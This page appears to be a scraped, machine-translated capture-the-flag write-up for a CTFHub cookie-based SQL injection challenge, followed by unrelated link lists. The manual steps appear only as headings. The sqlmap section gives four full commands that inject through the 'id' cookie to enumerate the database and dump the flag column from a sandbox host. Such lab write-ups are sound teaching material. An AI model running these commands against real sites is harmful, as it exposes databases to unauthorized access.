ctfhub skill tree -sql inject injection -Cookie

Others 2020-03-19 10:09:50 views: null

Hand Note

Open drone

View Page Info

Find a cookie

Whether the test was injected into the cookie

Ethereal

Try to inject

Successfully query to the database name

Query table name

Query field name

Query Field Information

Successfully got flag

sqlmap

Query the database name

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 --dbs

Query data table name

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 -D sqli --tables

Query field name

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 -D sqli -T mwlhneimpy --columns

Query Field Information

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 -D sqli -T mwlhneimpy -C pbsbpdhlmf --dump

Successfully got flag

Guess you like

Origin www.cnblogs.com/anweilx/p/12516632.html

ctfhub skill tree -sql inject injection -Cookie

ctfhub skill tree -sql injection - the injection character

ctfhub skill tree -web pre-skills -http agreement -Cookie

[Ctfhub] SQL injection

SQL injection: Cookie injection

CTFHub- skill tree - command execution

CTFHub_ skill tree _ file upload

CTFHub Skill Tree Information Leakage——PHPINFO

CTFHub Skill Tree HTTP Protocol - Basic Authentication

Pikachu-Sql Inject (SQL injection)

Pikachu-----Sql Inject(SQL injection)

ctfhub skill tree - file upload - front-end verification

CTFHub skill tree -Web- file upload - no verification

CTFHub skill tree -Web- file upload -.htaccess

CTFHub skill tree -Web- truncated file upload -00

CTFHub skill tree backup file download - vim cache

CTFHub skill tree backup file download - website source code

CTFHub skill tree backup file download——.DS_Store

Pikahu-SQL injection module (Sql inject) (literacy articles)

CTFHub Web theme study notes (SQL injection problem solution writeup)

ctfhub Skilltree -SQL inject Injektions -cookie

ctfhub skill tree - leaked information - backup file download -.DS_Store

CTFHub_ Skill Tree_Web Information Leakage-"Git Leak"-"Log", "Stash", "Index"

Skill tree

skill tree

CTFHub-web(cookie)

SQL injection combat —— 3. Bypass the general anti-injection system and continue to inject

Recommended

The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!

Ranking

Getting the basic concepts of ROS + catkin Profile

Spring Learning (2) --- Assembling Beans in the IoC Container

js to get the src attribute of the image regularly

STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud

Short video learning - 3, pandas simple use of pivot_table

Print directory of project configuration log, output log

Understand the difference between vi and vim in Linux in 3 minutes

1 + x certificate Web front-end development HTML5 special exercises

mangodb save and insert the difference

7-1 Family tree processing (50 points) (binary tree solution)

Daily

2024-05-13(8)

2024-05-12(28)

2024-05-11(32)

2024-05-10(34)

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)